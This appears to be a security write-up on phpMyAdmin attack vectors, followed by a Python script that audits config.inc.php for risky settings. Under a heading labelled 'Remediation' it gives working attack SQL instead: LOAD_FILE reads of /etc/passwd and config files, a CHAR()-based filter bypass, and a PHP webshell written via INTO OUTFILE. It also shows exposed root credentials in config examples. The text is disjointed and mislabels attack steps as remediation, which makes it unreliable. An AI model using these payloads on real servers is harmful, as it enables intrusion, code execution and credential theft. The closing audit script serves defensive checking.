Headline: Security Analysis: Verifying phpMyAdmin Attack Vectors
In the field of web application security, phpMyAdmin remains one of the most frequently discovered services during internal network penetration tests. While often overlooked, it serves as a high-value target for lateral movement.
The "HackTricks Verified" Approach: When analyzing phpMyAdmin instances, researchers often rely on the "HackTricks" methodology, a comprehensive collection of technical tricks and procedures. However, verification is critical. Not all public exploits work on every server configuration.
Key Attack Surfaces: Recent audits have verified that the most successful attack vectors are not always zero-day exploits, but rather misconfigurations.
Remediation: To mitigate these verified risks, administrators must:
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');
Verification constraints:
Bypass tip: Use double LOAD_FILE(concat(CHAR(47),'etc',CHAR(47),'passwd')) if quotes are filtered.
If the database user has FILE privilege and secure_file_priv is empty, write a webshell:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";
Verification: Check secure_file_priv:
SHOW VARIABLES LIKE "secure_file_priv";
HackTricks Verified: On older MySQL, you can use INTO DUMPFILE for binary shells (e.g., reverse shell ELF).
The file config.inc.php contains the authentication method and credentials. If you can read it (via LFI or misconfiguration), you own the database.
Example exposed content:
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'Sup3rStr0ng!';
Verification: When auth_type = 'config', you are automatically logged in on accessing phpMyAdmin. No password prompt. This is a catastrophic misconfiguration. These credentials often have broad privileges.
Though rare in recent versions, older phpMyAdmin releases had SQL injection vulnerabilities in their own interface (e.g., CVE-2015-2208, CVE-2016-6628).
Attackers could bypass login or execute arbitrary queries without valid credentials.
phpMyAdmin is vulnerable to code execution attacks when the "AllowArbitraryServer" option is enabled. An attacker can execute system-level commands or upload malicious files.
| CVE | Impact |
|------------|-------------------------------------------------|
| CVE-2018-12613 | Local file inclusion via target parameter. |
| CVE-2019-11768 | XSS to session hijacking (fewer risks today). |
| CVE-2020-26934 | CSRF leading to SQL execution. |
Always check current CVEs for the exact version found.
If an attacker can read config.inc.php (via LFI, path traversal, or backup files), they might find:
$cfg['Servers'][$i]['controluser'] = 'pma_user';
$cfg['Servers'][$i]['controlpass'] = 'secret';
These credentials often have broad privileges.
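A defensive check for the config.inc.php settings discussed above, as an added example that is not part of the original page or of phpMyAdmin itself: it scans the file text for auth_type 'config', a stored password, the root user, AllowArbitraryServer and a stored controlpass. The sample configs are constructed, the function names are hypothetical, and it assumes simple literal assignments for a single server block.

```python
import re

# Simple literal assignments: $cfg['Servers'][$i]['key'] = 'value'; or $cfg['Key'] = true;
# Lines commented out with // or # do not match because $cfg must start the line.
ASSIGN = re.compile(
    r"""^\s*\$cfg(?:\['Servers'\]\[[^\]]+\])?\['(\w+)'\]\s*=\s*('[^']*'|"[^"]*"|\w+)\s*;""",
    re.MULTILINE,
)

def parse_settings(text):
    """Map each setting name to its literal value (last assignment wins)."""
    return {k: v.strip("'\"") for k, v in ASSIGN.findall(text)}

def audit(text):
    """Return (setting, finding) pairs for the risky values discussed on the page."""
    s = parse_settings(text)
    findings = []
    if s.get("auth_type") == "config":
        findings.append(("auth_type", "auto-login without a prompt; use 'cookie' or 'http'"))
        if s.get("password"):
            findings.append(("password", "plaintext database password in the config file"))
    if s.get("user") == "root":
        findings.append(("user", "phpMyAdmin bound to root; use a least-privilege account"))
    if s.get("AllowArbitraryServer", "false").lower() == "true":
        findings.append(("AllowArbitraryServer", "users can point phpMyAdmin at any host; disable"))
    if s.get("controlpass"):
        findings.append(("controlpass", "control user secret in file; restrict file mode and grants"))
    return findings

# Constructed sample: the page's exposed values plus an assumed AllowArbitraryServer line.
WEAK = """
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'Sup3rStr0ng!';
$cfg['Servers'][$i]['controluser'] = 'pma_user';
$cfg['Servers'][$i]['controlpass'] = 'secret';
$cfg['AllowArbitraryServer'] = true;
"""

# Constructed hardened counterpart: interactive login, no stored password.
HARDENED = """
$cfg['Servers'][$i]['auth_type'] = 'cookie';
// $cfg['Servers'][$i]['password'] = 'old';
$cfg['AllowArbitraryServer'] = false;
"""

if __name__ == "__main__":
    for name, finding in audit(WEAK):
        print(f"[!] {name}: {finding}")
    print("hardened findings:", audit(HARDENED))
```

The parser does not handle /* */ block comments or values built from PHP expressions, so treat an empty result as "nothing obvious" rather than proof of a safe configuration.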